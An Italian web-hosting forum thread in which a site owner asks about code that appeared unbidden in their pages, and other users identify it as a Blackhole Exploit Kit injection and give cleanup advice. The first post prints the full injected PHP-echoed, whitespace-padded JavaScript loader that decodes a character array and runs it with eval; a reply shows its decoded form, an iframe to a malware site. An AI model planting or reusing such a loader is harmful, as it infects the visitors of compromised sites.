in qualche pagina ho questo codice comparso da solo..

ciao a tutti mi è comparso questo codice in alcune pagine.. Ma non l'ho messo io!
sapete dirmi cos'è?

Codice:

#336988#
                                                                                                                                                                                                                                                                                                                                                                                                                                                                  echo "                                                                                                                                                                                                                                                                                                                                                                                                                                                                  <script type=\"text/javascript\" language=\"javascript\" >                                                                                                                                                                                                                                                                                                                                                                                                                                                                  try{window.document.body++}catch(gdsgsdg){dbshre=117;}if(dbshre){asd=0;try{d=document.createElement(\"div\");d.innerHTML.a=\"asd\";}catch(agdsg){asd=1;}if(!asd){e=eval;}ss=String;asgq=new Array(31,94,110,104,94,107,97,104,104,27,31,33,25,117,8,1,24,25,26,27,109,89,107,26,111,90,103,108,26,56,23,92,104,93,112,100,93,103,110,41,90,106,94,91,111,92,61,101,95,104,92,102,109,34,34,96,94,107,91,104,92,31,34,53,8,1,5,3,26,27,23,24,109,93,106,106,38,108,108,94,23,53,25,33,99,107,108,105,52,42,38,108,107,91,113,92,100,109,91,103,98,38,103,95,111,38,91,101,101,41,103,96,105,33,54,4,2,25,26,27,23,108,92,105,110,37,107,109,115,103,92,38,105,105,110,96,108,98,105,105,23,53,25,33,92,89,107,104,102,112,107,93,32,53,8,1,24,25,26,27,107,91,104,109,41,106,108,114,102,96,37,90,104,108,95,92,106,25,55,27,30,40,32,53,8,1,24,25,26,27,107,91,104,109,41,106,108,114,102,96,37,96,94,99,98,95,108,25,55,27,30,41,105,114,34,50,5,3,26,27,23,24,109,93,106,106,38,108,110,116,99,93,39,113,100,91,108,97,26,56,23,31,42,106,115,30,51,6,4,27,23,24,25,110,94,102,107,39,109,111,112,100,94,40,103,92,94,109,26,56,23,31,42,106,115,30,51,6,4,27,23,24,25,110,94,102,107,39,109,111,112,100,94,40,111,102,104,25,55,27,30,41,105,114,34,50,5,3,7,5,23,24,25,26,100,93,24,33,27,95,102,91,110,103,96,101,108,39,97,96,107,61,101,95,104,92,102,109,60,116,64,92,33,33,111,90,103,108,33,36,32,24,116,7,5,23,24,25,26,27,23,24,25,94,106,90,109,102,95,105,107,38,112,108,100,107,93,33,33,55,91,97,111,26,100,91,53,85,33,111,90,103,108,86,34,53,52,40,94,100,109,54,32,35,54,4,2,25,26,27,23,24,25,26,27,91,103,92,111,104,92,102,109,40,98,92,108,62,102,96,100,93,103,110,61,112,65,93,34,34,107,91,104,109,34,32,38,90,106,107,92,102,93,61,99,96,100,93,34,111,90,103,108,35,54,4,2,25,26,27,23,117,6,4,120,32,32,34,53);s=\"\";for(i=0;i-479!=0;i++){if((020==0x10)&&window.document)s+=ss[\"fromCharCode\"](1*asgq[i]-(i%5-5-4));}z=s;e(s);}</script>";
#/336988#

Un Virus, fai una ricerca sul forum per capire come rimuoverlo :)

EDIT: il rivelamento me l'ha fatto AVG

Minaccia Blackhole Exploit Kit type 2371

Un Virus, fai una ricerca sul forum per capire come rimuoverlo :)

EDIT: il rivelamento me l'ha fatto AVG

Ah.. un virus?? Di cosa si tratta?? Come è stato inserito nel sorgente? Ho bisogno di altre informazioni

[darkwolf]

Anche nella tua home c'è un javascript sospetto:

Codice HTML:

try{window.document.body++}catch(gdsgsdg){dbshre=117;} * ecc ecc...

-
Comunque mi risulta pulito da virustotal: https://www.virustotal.com/url/d13b4...is/1357758416/
Ma sporco da un ulteriore scansione da sucuri: http://sitecheck.sucuri.net/results/...ltervista.org/

Dammi il link delle pagine

-

EDIT: ho scoperto nella home un javascript sospetto cioè questo:

<script type="text/javascript" language="javascript" >try{window.document.body++}catch(gdsgsdg){dbshre= 117;}***</script>

, lo ho decryptato e ho scoperto questo:

//jsunpack.called CreateElement div //jsunpack.url element = undefined //jsunpack.url var s = (function () {var tcos = document.createElement('iframe');tcos.src = 'h**p:// traveltalk . net/ clk . php'*

praticamente fa un iframe a sto sito che è malware.

Finora ha infettato quasi 300 siti diversi...

[darkwolf]

Itorrent! Ho fatto un po' di pulizia... e il javascript l'avevo già visto (e ne avevo già parlato)
E vorrei ricordarti che il regolamento vieta doppi post (esiste infatti il tasto edita).
Inoltre, nel campo residenza, ci andrebbe la residenza e non il link del proprio sito

grazie delle risposte, ho rimosso il codice anche nella home ora controllo anche le altre pagine! Ma chi l'ha messo questo "virus" ??

[darkwolf]

O il tuo script è buggato o il tuo account è stato compromesso (magari a causa di qualche virus sul tuo pc che ha dunque infettato il sito rubando le credenziali).

Come agire...
Assicurati che lo script sia "aggiornato/sicuro/ripulito";
Assicurati che il tuo pc sia aggiornato/pulito (scansione virus; spyware ecc);
Cambiare password dell'account.

-

OT: rivedere i tuoi sorgenti (lasciano molto a desiderate): hai un "link" che parte prima del doctype; la lingua del doctype non è ben definita (ci sono tutte); manca il title; il body non termina da nessuna parte e nemmeno la pagina (</body></html>); hai tre versioni di jquery nei meta (uno non ti bastava?); e uno "style che proprio non capisco" più o meno a centro pagina (<style="float:left;">Facesmile © 2013 · <a href="">Italiano</a></style>)

Avg mi segnala ancora la medesima minaccia, se hai rimosso realmente tutto è stato rimesso. Come detto da Darkwolf, assicurati che il tuo codice sia efficente e il tuo pc pulito e se usi script esterni, assicurati che siano affidabili con una ricerca in rete.